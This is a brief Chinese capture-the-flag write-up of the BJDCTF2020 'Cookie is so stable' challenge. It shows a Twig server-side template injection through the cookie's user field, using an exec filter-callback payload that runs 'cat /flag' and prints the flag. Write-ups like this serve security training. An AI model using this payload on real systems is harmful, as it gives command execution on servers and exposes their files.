首页 > 其他 > 详细

[BJDCTF2020]Cookie is so stable

时间:2020-12-10 09:37:21      阅读:34      评论:0      收藏:0      [点我收藏+]

https://github.com/BjdsecCA/BJDCTF2020

 

打开网页,在hint里获得提示让观察cookie

在flag里面的输入框输入"aa",在cookie里发现了user变为"aa"

输入框中输入"{{7*‘7‘}}",返回49,说明是Twig

于是在user里输入"{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}"得到flag:

flag{48315c84-e112-4ed3-beb9-96a97194a396}

[BJDCTF2020]Cookie is so stable

原文:https://www.cnblogs.com/hktk1643/p/14111783.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!